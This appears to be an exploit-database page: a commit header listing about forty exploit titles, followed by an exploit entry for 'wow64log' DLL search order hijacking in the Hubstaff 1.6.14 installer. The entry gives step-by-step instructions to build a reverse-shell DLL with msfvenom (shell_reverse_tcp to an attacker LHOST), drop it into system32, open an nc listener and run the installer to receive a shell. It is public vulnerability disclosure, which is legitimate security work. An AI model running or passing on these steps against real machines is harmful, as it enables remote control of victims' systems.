0a7adaa3fc
40 changes to exploits/shellcodes/ghdb Optoma 1080PSTX Firmware C02 - Authentication Bypass Screen SFT DAB 600/C - Authentication Bypass Account Creation Screen SFT DAB 600/C - Authentication Bypass Admin Password Change Screen SFT DAB 600/C - Authentication Bypass Erase Account Screen SFT DAB 600/C - Authentication Bypass Password Change Screen SFT DAB 600/C - Authentication Bypass Reset Board Config Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx) PnPSCADA v2.x - Unauthenticated PostgreSQL Injection Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution Yank Note v3.52.1 (Electron) - Arbitrary Code Execution Apache Superset 2.0.0 - Authentication Bypass FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting) PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE) Affiliate Me Version 5.0.1 - SQL Injection Best POS Management System v1.0 - Unauthenticated Remote Code Execution Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated) CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting) e107 v2.3.2 - Reflected XSS File Thingie 2.5.7 - Remote Code Execution (RCE) GetSimple CMS v3.3.16 - Remote Code Execution (RCE) LeadPro CRM v1.0 - SQL Injection PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS) Prestashop 8.0.4 - CSV injection Quicklancer v1.0 - SQL Injection SitemagicCMS 4.4.3 - Remote Code Execution (RCE) Smart School v1.0 - SQL Injection Stackposts Social Marketing Tool v1.0 - SQL Injection thrsrossi Millhouse-Project 1.414 - Remote Code Execution TinyWebGallery v2.5 - Remote Code Execution (RCE) WBiz Desk 1.2 - SQL Injection Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS) WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking MobileTrans 4.0.11 - Weak Service Privilege Escalation Trend Micro OfficeScan Client 10.0 - ACL Service LPE eScan Management Console 14.0.1400.2281 - Cross Site Scripting eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
48 lines
No EOL
1.5 KiB
Text
48 lines
No EOL
1.5 KiB
Text
*#Exploit Title:* Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
|
|
*#Date:* 14/05/2023
|
|
*#Exploit Author:* Ahsan Azad
|
|
*#Vendor Homepage:* https://hubstaff.com/
|
|
*#Software Link:* https://app.hubstaff.com/download
|
|
*#Version:* 1.6.13, 1.6.14
|
|
*#Tested On:* 64-bit operating system, x64-based processor
|
|
|
|
*Description*
|
|
Hubstaff is an employee work tracker with screenshots, timesheets, billing,
|
|
in-depth reports, and more.
|
|
|
|
During testing. It was found that the system32 subdirectory was missing a
|
|
DLL library with the name *wow64log.dll* that had been required by the
|
|
hubstaff's setup file during installation. Hence, using Metasploit's
|
|
msfvenom to create a new wow64log.dll file, Tester was able to get a
|
|
reverse shell locally.
|
|
|
|
|
|
*Exploit*
|
|
1- Generate a dll file with the name wow64log.dll using the command:
|
|
|
|
*msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll
|
|
-o wow64log.dll*
|
|
|
|
2- Place the newly generated DLL to the *system32 *directory.
|
|
3- Start a listener on attacker's console using:
|
|
|
|
*nc -lnvp <port_used_while_generating_DLL>*
|
|
|
|
4- Launch the exe.
|
|
|
|
Reverse shell will be receive as:
|
|
|
|
|
|
*C:\Windows>*
|
|
|
|
|
|
|
|
*Attachments (For the understanding of verification team)*
|
|
1.png - Showing the wow64.dll was not found by the exe. [image: 1.png]
|
|
|
|
2.png - Showing how tester was able to generate a new dll using msfvenom on
|
|
port 1337.
|
|
[image: 2.png]
|
|
|
|
3.png - Showing a reverse connection received on the attacker's console
|
|
at C:\Windows> by launching the exe.[image: 3.png] |